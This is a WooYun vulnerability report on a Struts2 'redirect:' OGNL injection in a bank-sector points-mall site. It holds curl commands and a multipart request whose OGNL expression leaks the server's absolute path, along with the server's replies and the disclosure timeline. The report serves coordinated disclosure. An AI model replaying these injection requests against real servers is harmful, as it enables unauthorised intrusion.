乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-19: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-12-04: 细节向核心白帽子及相关领域专家公开 2015-12-14: 细节向普通白帽子公开 2015-12-24: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
1.
curl http://**.**.**.**/integral/web/productDetail/detailProduct.action\?iProduct\=17976\?redirect:/xxoo
返回空白页2.
curl http://**.**.**.**/integral/web/productDetail/detailProduct.action\?iProduct\=17976 -d "redirect:/xxoo=1"
返回空白页3.
curl -i http://**.**.**.**/integral/web/productDetail/detailProduct.action\?iProduct\=17976 -F "redirect:/xxoo=1"
HTTP/1.1 100 ContinueHTTP/1.1 302 Moved TemporarilyDate: Tue, 10 Nov 2015 08:42:17 GMTServer: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7i DAV/2Location: http://**.**.**.**/xxooTransfer-Encoding: chunkedContent-Type: text/html<html><head><title>302 Moved Temporarily</title></head><body bgcolor="#FFFFFF"><p>This document you requested has moved temporarily.</p><p>It's now at <a href="http://**.**.**.**/xxoo">http://**.**.**.**/xxoo</a>.</p> //这里跳转了。地址是xxoo</body></html>
302跳转了。。
直接使用Burp进行提交
POST /integral/web/productDetail/detailProduct.action?iProduct=17976 HTTP/1.1User-Agent: curl/7.33.0Host: **.**.**.**Accept: */*Proxy-Connection: Keep-AliveContent-Length: 234Content-Type: multipart/form-data; boundary=------------------------4a606c052a893987--------------------------4a606c052a893987Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"-1--------------------------4a606c052a893987--
得到的路径是
/cnbs/cnbspt_ms1/eosdomain/applications/eos4wl/default.war
整个过程参考https://**.**.**.**/bugs/wooyun-2015-0147301
危害等级:中
漏洞Rank:9
确认时间:2015-11-24 15:34
CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置,同时转由CNCERT发福建分中心。
暂无